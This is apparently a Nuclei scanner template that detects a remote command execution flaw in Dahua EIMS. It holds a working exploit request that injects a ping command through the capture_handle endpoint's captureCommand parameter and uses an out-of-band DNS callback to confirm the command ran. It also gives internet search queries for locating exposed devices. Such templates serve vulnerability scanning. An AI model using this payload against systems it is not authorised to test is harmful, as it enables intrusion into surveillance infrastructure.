id: dahua-eims-rce

info:
  name: Dahua EIMS - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    Dahua EIMS capture_handle interface allows remote command execution.
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://cn-sec.com/archives/2554372.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: "<title>eims</title>"
    zoomeye-query: app:"大华 EIMS"
  tags: dahua,rce,eims

http:
  - method: GET
    path:
      - "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: regex
        regex:
          - "^success$"
# digest: 4a0a0047304502204c8e8f930bb56dc18e15d1246becf227edebef661a92d5db320afc11a1e290030221009c3b72f6ae1afe50d28e4b1bfbc6190ab68dcf37cd5e89f8f7006f19d4f889e1:922c64590222798bb761d5b6d8e72950